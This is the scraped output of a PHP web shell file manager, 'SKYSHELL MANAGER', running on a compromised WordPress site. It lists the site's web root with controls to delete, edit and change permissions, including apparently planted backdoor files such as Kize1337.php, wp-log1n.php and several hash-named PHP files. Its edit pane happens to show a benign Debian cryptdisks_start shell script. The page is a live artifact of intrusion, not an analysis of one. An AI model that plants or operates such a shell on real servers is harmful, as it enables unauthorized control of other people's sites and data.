📁
SKYSHELL MANAGER-
🛒
PHP v8.3.27
Create Folder
Create File
Current Path:
www
/
wwwroot
/
sv388sc.com
/
Name
Size
Permissions
Actions
📁
..
-
0777
🗑️
🔒
📁
185424
-
0755
🗑️
🔒
📁
2613c
-
0555
🗑️
🔒
📁
264276
-
0755
🗑️
🔒
📁
e25b86
-
0755
🗑️
🔒
📁
images
-
0755
🗑️
🔒
📁
wp-admin
-
0755
🗑️
🔒
📁
wp-content
-
0755
🗑️
🔒
📁
wp-includes
-
0755
🗑️
🔒
📄
.htaccess
1.13 KB
0555
🗑️
⬇️
✏️
🔒
📄
Kize1337.php
7.54 KB
0644
🗑️
⬇️
✏️
🔒
📄
ORVX-2LpmWS.php
399.32 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_122d0be7.php
24.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_e37f8d6e.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
buy.php
1.45 KB
0444
🗑️
⬇️
✏️
🔒
📄
click.php
1.93 KB
0444
🗑️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
index.php
19.07 KB
0444
🗑️
⬇️
✏️
🔒
📄
index.php0
31.42 KB
0755
🗑️
⬇️
✏️
🔒
📄
it_05f98c69.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
it_0a6eaac8.php
216.49 KB
0644
🗑️
⬇️
✏️
🔒
📄
item.php
2 KB
0444
🗑️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
⬇️
✏️
🔒
📄
mah.php
1.93 KB
0444
🗑️
⬇️
✏️
🔒
📄
networks.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
options.php
2 KB
0444
🗑️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
⬇️
✏️
🔒
📄
plugins.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
product.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
robots.txt
0.34 KB
0444
🗑️
⬇️
✏️
🔒
📄
ru_9a7b823f.php
70.78 KB
0644
🗑️
⬇️
✏️
🔒
📄
txets.php
5.32 KB
0444
🗑️
⬇️
✏️
🔒
📄
us_a54f0f43.php
53 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.46 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config.php
3.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-load.php
3.96 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-log1n.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-login.php
5.96 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-settings.php
30.33 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-signup.php
33.71 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
⬇️
✏️
🔒
Editing: cryptdisks_start
#!/bin/sh # cryptdisks_start - wrapper around cryptsetup which parses # /etc/crypttab, just like mount parses /etc/fstab. # Initial code and (c) 2007 Jon Dowland <jon@alcopop.org> # License: GNU General Public License, v2 or any later # (https://www.gnu.org/copyleft/gpl.html) set -e . /lib/cryptsetup/cryptdisks-functions INITSTATE="manual" DEFAULT_LOUD="yes" FORCE_START="yes" usage() { local rv="${1:-1}" echo "Usage: $0 [-r|--readonly] <name> [.. <name>]" >&2 echo >&2 echo "reads $TABFILE and starts the mapping corresponding to <name>" >&2 exit $rv } CRYPTTAB_EXTRA_OPTIONS= while [ $# -gt 0 ]; do case "$1" in -r|--readonly) CRYPTTAB_EXTRA_OPTIONS="${CRYPTTAB_EXTRA_OPTIONS:+$CRYPTTAB_EXTRA_OPTIONS,}readonly";; -h|--help|-\?) usage 0;; --) shift; break;; -*) echo "Error: unknown option '$1'" >&2; usage 1;; *) break;; esac shift done [ $# -gt 0 ] || usage 1 if [ $(id -u) -ne 0 ]; then log_warning_msg "$0 needs root privileges" exit 1 fi log_action_begin_msg "Starting crypto disk" mount_fs rv=0 for name in "$@"; do if ! crypttab_find_entry --quiet "$name"; then device_msg "$name" "failed, not found in crypttab" rv=1 else if [ -n "$CRYPTTAB_EXTRA_OPTIONS" ]; then CRYPTTAB_OPTIONS="$CRYPTTAB_OPTIONS,$CRYPTTAB_EXTRA_OPTIONS" _CRYPTTAB_OPTIONS="$_CRYPTTAB_OPTIONS,$CRYPTTAB_EXTRA_OPTIONS" fi setup_mapping || rv=$? fi done umount_fs log_action_end_msg $rv exit $rv
💾 Save Changes